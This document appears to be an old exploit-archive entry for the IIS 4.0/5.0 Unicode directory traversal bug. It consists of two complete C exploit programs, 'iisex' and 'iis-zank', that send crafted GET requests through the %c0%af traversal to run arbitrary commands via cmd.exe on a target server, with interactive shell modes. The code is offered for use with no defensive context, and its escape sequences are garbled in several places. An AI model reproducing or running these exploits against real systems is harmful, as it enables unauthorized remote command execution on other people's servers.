[2000]MS Windows IIS Unicode Remote Transversal Bug

/* iisex iis exploit  (<- nost's idea) v2
* --------------------------------------
* Okay.. the first piece of code was not really finished.
* So, i apologize to everybody..
*
* by incubus <incubus@securax.org>
*
* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up
* at night to exploit this?) to securax (#securax@efnet) - also
* to kim, glyc, s0ph, tessa, lamagra and steven.
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv){
char buffy[666]; /* well, what else? I dunno how long your commands are.. */
char buf[500];
char rcvbuf[8192];
int i, sock, result;
struct sockaddr_in 	name;
struct hostent 	*hostinfo;
if (argc < 2){
printf ("try %s www.server.com/n", argv[0]);
printf ("will let you play with cmd.exe of an IIS4/5 server./n");
printf ("by incubus <incubus@securax.org>/n/n");
exit(0);
}
printf ("/niisex - iis 4 and 5 exploit/n---------------------------/n");
printf ("act like a cmd.exe kiddie, type quit to quit./n");
for (;;)
{
printf ("/n[enter cmd> ");
gets(buf);
if (strstr(buf, "quit")) exit(0);
i=0;
while (buf[i] != '/n'){
if(buf[i] == 32) buf[i] = 43;
i++;
}
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Oops"); exit(-1);
}
name.sin_family=AF_INET; name.sin_port=htons(80);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
if (sock < 0){
herror("Oops"); exit(-1);
}
strcpy(buffy,"GET /scripts/../%c0%af../winnt/system32/cmd.exe?/c+");
strcat(buffy,buf);
strcat(buffy, " HTTP/1.0/n/n");
send(sock, buffy, sizeof(buffy), 0);
recv(sock, rcvbuf, sizeof(rcvbuf), 0);
printf ("%s", rcvbuf);
close(sock);
}
}

/****************************************************************************/
**                                                                          **
**    Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit    **
**      proof of theory exploit cuz it's wednesday and i'm on the couch     **
**                                                                          **
**       brought to you by the letter B, the number 7, optyx, and t12       **
**          optyx - <optyx@uberhax0r.net optyx@newhackcity.net>             **
**          t12 - <t12@uberhax0r.net>                                       **
**                                                                          **
**     greetz go out to aempirei, a gun toatin' gangstah' hustler' player   **
**     motherfucker who isn't with us anymore, miah, who's GTA2 game was    **
**     was most entertaining tonight, Cathy, who provided the trippy light  **
**     to stare at, and to KT, for providing me with hours of decent        **
**     conversation.                                                        **
**                                                                          **
/****************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>

void usage(void)
{
fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>");
fprintf(stderr, " [-p port] [-t timeout]/n");
exit(-1);
}

int main(int argc, char **argv)
{
int i, j;
int port=80;
int timeout=3;
int interactive=0;
char temp[1];
char host[512]="";
char cmd[1024]="";
char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
struct hostent *he;
struct sockaddr_in s_addr;

printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c/n");
printf("by optyx and t12/n");

for(i=0;i<argc;i++)
{ if(argv[i][0] == '-') {
for(j=1;j<strlen(argv[i]);j++)
{
switch(argv[i][j])
{
case 't':
strncpy(host, argv[i+1], sizeof(host));
break;
case 'c':
strncpy(cmd, argv[i+1], sizeof(cmd));
break;
case 'h':
usage();
break;
case 'o':
timeout=atoi(argv[i+1]);
break;
case 'p':
port=atoi(argv[i+1]);
break;
case 'i':
interactive=1;
break;
default:
break;
}
}
}
}

if(!strcmp(host, ""))
{
fprintf(stderr, "specify target host/n");
usage();
}

if(!strcmp(cmd, "") && !interactive)
{
fprintf(stderr, "specify command to execute/n");
usage();
}

printf("]- Target - %s:%d/n", host, port);
if(!interactive)
printf("]- Command - %s/n", cmd);
printf("]- Timeout - %d seconds/n", timeout);
if((he=gethostbyname(host)) == NULL)
{
fprintf(stderr, "invalid target/n");
usage();
}

do
{

if(interactive)
{
cmd[0]=0;
printf("/nC> ");
if(fgets(cmd, sizeof(cmd), stdin) == NULL)
fprintf(stderr, "gets() error/n");
cmd[strlen(cmd)-1]='/0';
if(!strcmp("exit", cmd))
exit(-1);
}

for(i=0;i<strlen(cmd);i++)
{
if(cmd[i]==' ')
cmd[i]='+';
}

strncpy(request,
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
sizeof(request));
strncat(request, cmd, sizeof(request) - strlen(request));
strncat(request, "/n", sizeof(request) - strlen(request));

s_addr.sin_family = PF_INET;
s_addr.sin_port = htons(port);
memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr,
sizeof(s_addr.sin_addr));

if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
fprintf(stderr, "cannot create socket/n");
exit(-1);
}

alarm(timeout);
j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));
alarm(0);

if(j==-1)
{
fprintf(stderr, "cannot connect to %s/n", host);
exit(-1);
close(i);
}

if(!interactive)
printf("]- Sending request: %s/n", request);

send(i, request, strlen(request), 0);

if(!interactive)
printf("]- Getting results/n");

while(recv(i,temp,1, 0)>0)
{
alarm(timeout);
printf("%c", temp[0]);
alarm(0);
}

}
while(interactive);

close(i);
return 0;
}